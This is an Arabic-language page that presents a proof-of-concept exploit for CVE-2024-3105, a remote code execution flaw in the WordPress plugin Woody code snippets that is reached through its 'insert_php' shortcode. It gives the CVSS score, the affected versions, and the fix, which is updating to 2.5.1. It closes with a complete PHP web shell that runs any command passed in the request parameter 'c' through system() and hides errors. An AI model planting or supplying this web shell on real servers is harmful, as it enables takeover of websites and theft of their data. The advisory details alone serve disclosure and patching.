
استغلال PoC لثغرة CVE-2024-3105 - إضافة Woody code snippets – Insert Header Footer Code, AdSense Ads لووردبريس: تنفيذ كود عن بُعد (RCE)
إضافة Woody code snippets – Insert Header Footer Code, AdSense Ads لـ WordPress معرّضة لثغرة تنفيذ الأكواد عن بُعد (Remote Code Execution) في جميع الإصدارات حتى 2.5.0 ضمنًا، عبر shortcode 'insert_php'. يعود السبب إلى أن الإضافة لا تقيّد استخدام هذه الوظيفة على المستخدمين المصرح لهم بمستوى عالٍ. وهذا يتيح للمهاجمين المصادَق عليهم، ممن لديهم وصول بمستوى مساهم أو أعلى، تنفيذ أكواد على الخادم.
النتيجة الأساسية: 9.9 حرجة
المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
نوع البرنامج: إضافة
المعرّف البرمجي: insert-php
المعالجة: تحديث إلى الإصدار 2.5.1، أو إصدار أحدث مصحّح
الإصدار المتأثر: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>